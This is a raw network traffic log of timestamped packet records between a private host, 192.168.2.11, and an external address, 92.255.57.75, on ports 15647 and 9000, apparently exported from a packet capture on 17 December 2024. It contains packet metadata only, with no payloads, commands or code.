Dec 17, 2024 08:40:19.331846952 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.338879108 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.366709948 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.366851091 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:19.394328117 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.395865917 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:19.417488098 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.419912100 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:19.423659086 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.441734076 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.449151993 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.449263096 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:19.485526085 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:19.495709896 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.495841980 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:19.534830093 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:19.539685965 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.539833069 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:19.563225985 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:19.586215973 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.587846041 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:19.605374098 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.606242895 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:19.626086950 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:19.646761894 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:19.653745890 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.653816938 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.654500961 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:19.655359030 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.656028032 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.656162977 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.656261921 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:19.678839922 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.683011055 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.690412998 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.690501928 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.690722942 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:19.725939989 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.726102114 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:19.732031107 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.733701944 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.733808041 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.733835936 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:19.736203909 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.736273050 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.736429930 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:19.746023893 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.766592979 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.767266035 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:19.776635885 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.776729107 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.776974916 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:19.817513943 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:19.836682081 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:19.855631113 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:19.872920036 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:19.909157991 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:19.921365023 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.921390057 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.921602964 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:19.922400951 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.922497034 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:19.941613913 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:19.942321062 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:19.966556072 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:19.985172033 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.004853964 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.022574902 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.041357040 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.041534901 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.064193010 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.084388018 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.102404118 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.132179976 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.139354944 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.139374018 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.139383078 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.139403105 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.139467955 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.139477968 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.139487982 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.139539003 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.139539003 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.139549017 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.139566898 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.139579058 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.139586926 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.139606953 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.139616013 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.139626026 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.139636040 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.139643908 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.139643908 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.139673948 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.139931917 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.139983892 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.139993906 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.140003920 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.140013933 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.140022993 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.140048981 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.140094995 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.140094995 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.140099049 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.140113115 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.142530918 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.163146019 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.163207054 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.163362980 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.184099913 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.184259892 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.184818983 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.184947968 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.204242945 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.204639912 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.213258982 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.213476896 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.222197056 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.222356081 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.246989965 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.252135992 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.252465010 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.259979963 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.260905027 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.261483908 CET	9000	50050	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.261581898 CET	9000	50050	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.261661053 CET	50050	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.261899948 CET	50050	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.272629976 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.272665024 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.272834063 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.275321007 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.275368929 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.275513887 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.280430079 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.280556917 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.296212912 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.296309948 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.296430111 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.304613113 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.304795980 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.325117111 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.325176001 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.325335979 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.342138052 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.343730927 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.355053902 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.355334044 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.358007908 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.358020067 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.358211994 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.366821051 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.366899014 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.377530098 CET	50051	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.380698919 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.381635904 CET	9000	50050	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.381752014 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.393397093 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.393414974 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.393503904 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.396476030 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.396559000 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.403984070 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.404000044 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.404119015 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.424573898 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.424947977 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.445563078 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.445578098 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.445588112 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.445715904 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.453521013 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.476835966 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.477508068 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.481858969 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.481918097 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.482004881 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.484461069 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.499192953 CET	9000	50051	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.499878883 CET	50051	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.500138998 CET	50051	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.503348112 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.503856897 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.515182018 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.515496016 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.515623093 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.518652916 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.518927097 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.525536060 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.525779009 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.526293039 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.540700912 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.540741920 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.540906906 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.560602903 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.564519882 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.567881107 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.570130110 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.570149899 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.570246935 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.589322090 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.595810890 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.598737955 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.602041006 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.602745056 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.602798939 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.602950096 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.619895935 CET	9000	50051	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.622234106 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.635410070 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.636039972 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.637418985 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.637509108 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.646203041 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.647877932 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.656677961 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.659881115 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.661706924 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.661719084 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.661794901 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.680716038 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.681991100 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.683917046 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.686439991 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.686541080 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.686569929 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.689964056 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.691880941 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.693634987 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.693711996 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.709291935 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.710737944 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.720093966 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.720235109 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.720405102 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.733397007 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.735893965 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.742783070 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.744229078 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.756865025 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.757040977 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.757160902 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.765795946 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.765991926 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.766155005 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.780030966 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.800417900 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.803797007 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.803899050 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.810045958 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.810090065 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.810264111 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.814603090 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.815886021 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.815913916 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.831367016 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.831897974 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.843364954 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.843451023 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.843602896 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.864069939 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.864183903 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.873835087 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.873982906 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.878770113 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.878902912 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.899362087 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.901705027 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.902043104 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.902090073 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.902203083 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.926306963 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.931021929 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.931763887 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.934585094 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.934704065 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.951801062 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.951812983 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.951939106 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.963388920 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.963763952 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.972529888 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.972593069 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.972611904 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.994957924 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.995121956 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.997272015 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.997282982 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:20.997817993 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:20.998759031 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.000225067 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.006858110 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.006968021 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.019794941 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.023606062 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.023751020 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.034799099 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.035402060 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.035765886 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.047095060 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.048326969 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.054739952 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.056431055 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.056879997 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.057073116 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.069259882 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.071898937 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.075325966 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.075340033 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.075634956 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.078377008 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.092499971 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.116880894 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.116892099 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.117110968 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.123372078 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.123456955 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.128825903 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.128977060 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.155421972 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.155534029 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.155620098 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.168081045 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.176954031 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.177021980 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.184847116 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.184942961 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.191921949 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.191955090 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.192141056 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:21.211622953 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.211632967 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:21.211779118 CET	50034	15647	192.168.2.11	92.255.57.75
